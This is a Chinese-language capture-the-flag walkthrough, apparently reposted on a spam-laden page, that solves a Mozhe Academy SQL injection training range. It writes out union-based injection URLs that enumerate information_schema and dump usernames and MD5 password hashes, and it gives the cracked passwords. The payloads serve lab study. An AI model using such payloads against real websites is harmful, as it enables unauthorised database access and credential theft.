当前位置: 首页 > news >正文

双河市网站建设_网站建设公司_交互流畅度_seo优化

中华住房和城乡建设厅网站,销售管理系统的功能有哪些,昌平区网站建设,wordpress 办公主题———靶场专栏——— 声明#xff1a;文章由作者weoptions学习或练习过程中的步骤及思路#xff0c;非正式答案#xff0c;仅供学习和参考。 靶场背景#xff1a; 来源#xff1a; 墨者学院 简介#xff1a; 安全工程师墨者最近在练习SQL手工注入漏洞#… ———靶场专栏——— 声明文章由作者weoptions学习或练习过程中的步骤及思路非正式答案仅供学习和参考。 靶场背景 来源 墨者学院 简介 安全工程师墨者最近在练习SQL手工注入漏洞自己刚搭建好一个靶场环境NginxPHPMySQLPHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理 2.了解手工注入的方法 3.了解MySQL的数据结构 4.了解字符串的MD5加解密 解题方向 手工进行SQL注入测试获取管理密码登录。 解题思路 这是字符型注入可能会涉及到注释字符嗯~ o(*▽*)oMD5肯定就是MD5加密喽~ 先找到注入点再用语句尝试查询数据库信息再用select查找我们所需要的管理员登陆信息。 解题步骤 一、找到注入点 靶场~启动我的三个币啊/(ㄒoㄒ)/~~ . 这里有个停机维护的通知我们点进去看一眼。 http://124.70.91.203:49986/new_list.php?idtingjigonggao 找到了idtingjigonggao这可能是一个注入点尝试一下。 http://124.70.91.203:49986/new_list.php?idtingjigonggao and 11 输入后页面正常显示因为sql语序检查的是一个字符串而字符串的表示为text用单引号括起来的。假如此网站sql语句为 瞎写的不知道对不对 $id $_GET id $SQL select * from user where id $id 那么原来输入的就是 $SQL $_GET select * from user where tingjigonggao 我们验证时输入的是 $SQL $_GET select * from user where tingjigonggao and 11 这时候正常显示说明我们的注入语句是正确的再尝试tingjigonggao and 12验证注入点到底是不是在这里。 http://124.70.91.203:49986/new_list.php?idtingjigonggao and 12 OK,(机智.jpg)说明注入点就是在id 这里。 二、order by猜字段 有点繁琐直接把最终url信息发出来了。 124.70.91.203:49986/new_list.php?id?id-1 union select 1,2,3,4 order by 可以查询数据表的字段数量一来可以找到有回显的字段二来方便摸清正在访问的数据表中有几个列。 根据结果显示正在访问的数据表有四个列其中有第二列和第三列是有回显的。 三、查询数据库信息 version()                                数据库版本 database                        数据库名称 user                                数据库用户 version_compile_os       操作系统 例 124.70.91.203:49986/new_list.php?id?id-1 union select 1,version(),3,4 我们拿到的信息为 数据库版本10.2.15-MariaDB-log 数据库名称mozhe_discuz_stormgroup 数据库用户rootlocalhost 操作系统Linux 可以看到是root账户管理员账户是有权限进行增删改查和其他操作的。嗯我们题目不是mysql数据库吗管他呢。可以理解为MariaDB是mysql的升级版其实不是向下兼容。 四、查数据库表 MySQL高版本5.0以上都有一个称为information_schema的数据库其中存放着数据库所有的表名和列名信息。我们去查查看一下。 124.70.91.203:49986/new_list.php?id?id-1 union select 1,table_name,3,4 from information_schema.tables where table_schemamozhe_discuz_stormgroup-- 解析为查 “表名” 来自“information_schema数据库下面的tables表” 限定为 数据库名“mozhe_discuz_stormgroup”。后面的“--”“--”是注释后面的符号“”代表的是空格 我们再用group_concat()函数将所有都展示出来。 124.70.91.203:49986/new_list.php?id?id-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schemamozhe_discuz_stormgroup-- 五、查询用户信息表 用户信息就在stormgroup_member译为风暴组成员notice注意里面是没有的别问问就是试过了。 开叉呸~开查 124.70.91.203:49986/new_list.php?id?id-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_namestormgroup_member-- id,name,password,status 至此我们拿到的信息为mozhe_discuz_stormgroup数据库下面有个数据库表stormgroup_member下面有数据库列id,name,password,status。 接下来我们就去mozhe_discuz_stormgroup数据库下的stormgroup_member表查name和password就行了。 六、查用户数据 url码为 124.70.91.203:49986/new_list.php?id?id-1 union select 1,group_concat(name),group_concat(password),4 from stormgroup_member-- 拿到两个账号和密码 ①mozhe356f589a7df439f6f744ff19bb8092c0 ②mozhea8eed3d6ee9831d950d5b4dc2e27e506 密码进行MD5解密后为 ①mozhedsan13 ②mozhe437917 md5在线解密破解,md5解密加密 七、登陆尝试 ①mozhedsan13 ②mozhe437917 成功拿到key。 总结 难度★★★☆☆☆☆☆☆☆ 解析本身难度不是很高但是手工注入容易出错字母不好打对熟练就好了。 有需要工具的请私信。
http://www.ihoyoo.com/news/6774.html

相关文章:

  • 雅虎网站提交网站如何申请微信支付接口
  • soho做网站谷歌推广安徽省工程招标信息网
  • 网站开发工资一般多少钱图片制作在线制作免费
  • ps加dw做网站视频长沙seo排名外包
  • 公司网站建设方案所需素材网络营销理论起源
  • 提高seo排名网站排名优化各公司的
  • 好的网站首页建设公司中山手机网站建设电话
  • 小说网站搭建教程维护平台是什么工作
  • 一家只做t恤的网站南京网站制作公司南京微尚
  • 深圳做网站建设公司做网站的是什么职业
  • 网站域名解析视频制作流程
  • 暴雪公司现状洛阳搜索引擎优化
  • 济南网站优化分析做网站容易 但运营难
  • 淄博桓台学校网站建设定制专门做护肤品的网站是
  • 网站建设合同 域名目前最好用的网络管理软件
  • 首次做淘宝客网站要安装程序吗学生为学校做网站
  • 外国高端网站网站导航页面制作
  • 深圳网站设计 制作元申请网页空间
  • 模板网站下载查权重网站
  • 网站可以做什么2023年最新法定传染病有哪些
  • 网站建设 保定建设旅游信息网站的好处
  • 网站集约化平台建设网站实现多模板切换
  • 制作小程序网站源码WordPress主题(模板)制作教程
  • 万户网站建设网站改版说明
  • 网站文字特效如何咨询网络服务商
  • 济南网站建设设计制作公司那个网站可以做空比特币
  • 加强网站的建设工作的通知wordpress comer
  • 公司网站开发的流程上海高端品牌网站建设专家
  • 青岛建设厅官方网站wordpress去掉rss订阅
  • 网站建设qq群wordpress自动获取标签